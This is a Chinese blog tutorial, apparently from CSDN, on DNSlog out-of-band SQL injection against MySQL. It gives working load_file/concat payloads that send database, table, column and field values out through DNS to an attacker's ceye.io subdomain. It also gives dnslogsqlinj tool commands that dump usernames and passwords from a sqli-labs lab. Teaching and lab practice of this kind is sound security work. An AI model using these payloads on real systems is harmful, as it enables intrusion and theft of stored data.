SQL注入-DNSlog注入(手工加工具使用)

已于 2022-04-17 09:26:59 修改
阅读量7.4k 收藏 27
点赞数 7
分类专栏: 渗透笔记 文章标签: 安全 sql注入 DNSlog注入
于 2022-04-17 09:24:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56607768/article/details/124224966
版权

文章目录

一:DNSlog注入原理

Dns在域名解析时会留下域名和解析ip的记录,利用这点我们可以使用Dnslog(日志)记录显示我们的注入结果。通过load_file()不仅可以查看本地文件,也可以访问远程共享文件。 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了。DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息。简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息

请添加图片描述

二:DNSlog应用场景

在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入。如遇到MySql的盲注时,可以利用内置函数load_file()来完成DNSLOG。load_file()不仅能够加载本地文件,同时也能对诸如\www.test.com这样的URL发起请求。

PS:DNSLOG注入需要有两个条件,1.SQL服务器能连接网络;2.开启了LOAD_FILE() 读取文件的函数

三:DNSlog手工注入

1.要利用在线的dns在线服务器,网站可以记录下我们的DNS请求,并用网站查询信息

网站网址:http://www.dnslog.cn http://ceye.io/ http://admin.dnslog.link

2.pylaod构造

// 查询当前数据库
id=1'and load_file(concat("\\\\",database(),".913n8.ceye.io\\xxx.txt"))--+

//查询其他数据库
id=1'and load_file(concat("\\\\",(select schema_name from information_schema.schemata limit 0,1),".913n8.ceye.io\\xxx.txt"))--+
"""
由于该DNS记录只能回显一个字段,所以因该使用limit,第一个参数是查询起始位置,第二个参数是查询个数
limit 0,1 查询第一个数据库名
limit 1,1 查询第二个数据库名
limit 2,1 查询第三个数据库名
"""

//查询版本号
id=1'and load_file(concat("\\\\",version(),".913n8.ceye.io\\xxx.txt"))--+

//查询当前数据库security中第一个表名
id=1'and load_file(concat("\\\\",(select table_name from information_schema.tables where table_schema='security' limit 0,1 ),".913n8.ceye.io\\xxx.txt"))--+

"""
由于该DNS记录只能回显一个字段,所以因该使用limit,第一个参数是查询起始位置,第二个参数是查询个数
limit 0,1 查询第一个表名
limit 1,1 查询第二个表名
limit 2,1 查询第三个表名
"""
//查询security数据库emails表下第一个列名
id=1'and load_file(concat("\\\\",(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),".913n8.ceye.io\\xxx.txt"))--+

//查询字段值  数据库名为security 表名emails 列名id
id=1'and load_file(concat("\\\\",(select id from security.emails limit 0,1),".913n8.ceye.io\\xxx.txt"))--+

注意:要用limit控制查询的数,以及查询的位置

3.通知DNS在线服务器,查询日志,获取注入信息。

查询的截图:
请添加图片描述

请添加图片描述

请添加图片描述

四:利用DnslogSqlinj工具进入DNSlog注入

工具下载链接

https://github.com/adooo/dnslogsqlinj

需要使用python27环境

配置:

找到DNS在线服务器,例如上面用到的 http://ceye.io 找到profile 把相应的信息写到config.py中

请添加图片描述

使用语句:

获取数据库名:
python2.7 dnslogSql.py -u "http://127.0.0.1/sqli-labs/Less-9/?id=1' and ({})--+" --dbs
获取数据库security下的表名:
python2.7 dnslogSql.py -u "http://127.0.0.1/sqli-labs/Less-9/?id=1' and ({})--+" -D security --tables
获取users表的列名:
python2.7 dnslogSql.py -u "http://127.0.0.1/sqli-labs/Less-9/?id=1' and ({})--+" -D security -T users --columns
获取uses表中的数据:
python2.7 dnslogSql.py -u "http://127.0.0.1/sqli-labs/Less-9/?id=1' and ({})--+" -D security -T users -C username,password --dump

测试截图:

请添加图片描述

sql 注入 Dnslog
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-12 448
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
SQL注入DnsLog注入
qq_52310755的博客
03-22 2335
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
SQL注入(7)之DNSLOG注入
最新发布
2401_88816569的博客
03-13 796
DNSLog注入如何实现无回显数据窃取?解析盲注与外带数据结合攻击链路,拆解DNS请求窃密步骤及防御策略,强化隐蔽漏洞检测能力!
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 852
SQL注入——DNSlog注入
dnslogsql注入
weixin_44894463的博客
07-09 282
前两天看到了一个骚姿势,没有回显的时候利用dnslog来得到数据库名等。 可以在一个网站上注册ceye.io,注册就可以得到一个二级域名。 用到了load_file() ,用法是load_file(文件名),比如这样:select load_file(concat(’\\’,database(),’.xxxx.ceye.io\fwafw’)); 这个就相当于访问了table_schema.xxx...
SQL注入DNSlog方式
m0_57347472的博客
03-22 351
DNSlog注入也可以称之为dns带外查询,Dns在域名解析时会在DNS服务器上留下域名和解析il的记录,可以在dns服务器上查询相应的dns解析记录,来获取大致原理。那么我们就可以通过只有的方式然后拼接数据库函数,通过DNSlog获得数据库的信息。http://ceye.io/ 知道创宇公司提供的。上图是创宇公司提供的的DNSlog服务器网址。修改limit的数字即可得到其他表名。DNSlog服务器无需自己搭建。此处的路径我们称之为UNC路径。
SQL DNSlog注入详解
永远是少年
08-07 1433
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL DNSlog注入。 一、SQL DNSlog注入简介 二、SQL DNSlog注入实战
18-OWASP top10--SQL注入(三、MSSQL、Mysql手工注入Sqlmap工使用
XLbb的博客
05-27 1445
' 与and 1=1 and 1=2--检查注入点 ' order by 1,2--+&Submit=Submit#--检查字段 ' union select user(),version()--+&Submit=Submit# --查看数据库用户名和版本、库名 'union select 1,group_concat(schema_name) from inform 注入防御 1、涵数过滤 2、直接下载相关防范注入文件,通过incloud包含放在网站配置文件里面 3、PDO预处理
yxcms1.4.7版本审计sql注入-文件删除盲注配合dnslog解析数据
qq_29437513的博客
08-16 928
这是一篇cms审计内容,和之前做的文件包含+伪协议、反序列化入门内容不同,,拿项目练手。 我找了一下网上关于yxcms的漏洞,谷歌收录到1.4.6存在前台注入和后台文件删除盲注这两个洞,,对比发现1,4,7版本源码几乎相同。 下好1.4.7源码放到www目录下,访问进入了一个安装的页面 在找漏洞审计之前,登录后台关闭后登不上,提示站点账户锁定,这里折腾了很久,所以整个审计过程都不能关闭后台。 然后打开phpstorm开始审计源码: 这里我对phpstorm的操作不了解,看del函数这里 刚开始审计也不
SQL注入实例(sqli-labs/less-15)
Thewei666的博客
08-08 257
确定符号的闭合。
sqli-labs less-16 post提交dnslog注入
wanggonghanfei的博客
10-07 1174
sqli-labs less-16 post提交dnslog注入
dnslog:简约的 DNS 日志记录工
05-31
dns日志 信息 简约的 DNS 日志记录工。 捕获所有 DNS 流量并将其文本表示(以压缩形式)存储到/var/log/dnslog/<date>.log.gz 。 创建用于网络取证目的。 $ zcat /var/log/dnslog/2018-07-12.log.gz | head 00:00:00.001595 R A 192.168.107.168 192.168.110.233 ocsp.verisign.com 23.37.43.27 00:00:00.001949 Q PTR 192.168.107.146 199.253.182.182 2.6.e.f.a.b.e.f.f.f.6.5.0.5.2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa ? 00:00:00.002314 R AAAA 37.48.122.173 194.5
DNSlog-GO:DNSLog-GO是一种golang编写的监控DNS解析记录的工,自带WEB接口
03-08
简介 DNSLog-GO是一种golang编写的监控DNS解析记录的工,自带WEB接口 安装 详细图文教程: : 1.获取发行版这里下载最新发行版,并解压 2.域名与公网IP准备 搭建并使用 DNSLog,你需要拥有两个域名,一个域名作为 NS 服务器域名(例:a.com),一个用于记录域名(例: b.com)。还需要有一个公网 IP 地址(如:1.1.1.1) 注意:b.com 的域名提供商需要支持自定义 NS 记录, a.com 则无要求。 在 a.com 中设置两条 A 记录: ns1.a.com A 记录指向 1.1.1.1 ns2.a.com A 记录指向 1.1.1.1 修改 b.com 的 NS 记录为 1 中设定的两个域名 本步骤中,需要在域名提供商提供的页面进行设置,部分域名提供商只允许修改 NS 记录为已经认证过的 NS 地址。所以需要找
SQL手工注入辅助工
07-28
普通注入,cookies注入,中转注入,可自己灵活构键注入句话。扔开傻瓜式工,学习的好帮手。
SQL注入DNSLog外带注入
dragon的博客
02-21 3289
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
SQL注入之DNS_log注入
weixin_47785246的博客
07-11 942
SQL注入之DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入之DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
sql注入手工及一些工
weixin_30375427的博客
01-17 135
Sql注入原理分析:   网站程序存在可控传递参数,参数未进行过滤直接带入数据库查询,导致攻击者可通过传递恶意sql语句代码进行执行攻击。 Sql注入产生条件   1.必须有参数传递   2.参数值带入数据库查询并执行 判断是不是用注入:   例:http://www.xxx.xxx asp?id=xx asp?id=xx   用'或 and 1=1 正常页面     and 1...
使用DNSLog进行DNS请求追踪与分析
聚娃科技开发者博客
06-28 718
DNSLog提供了一种简单而有效的方式来捕获和分析DNS请求,从而帮助解决这些问题。是一种用于捕获和分析DNS(Domain Name System)请求的工,它可以帮助开发人员和网络管理员监控和分析域名解析过程中的各种请求和响应。通常,DNSLog可以作为一个开源工或服务提供,您可以在互联网上找到相应的文档和指南来安装和配置它。DNS请求的追踪和分析对于网络应用程序的性能优化和问题排查至关重要。通过配置DNSLog,您可以捕获并分析这些DNS解析请求,以便进一步分析和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

h1dm

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值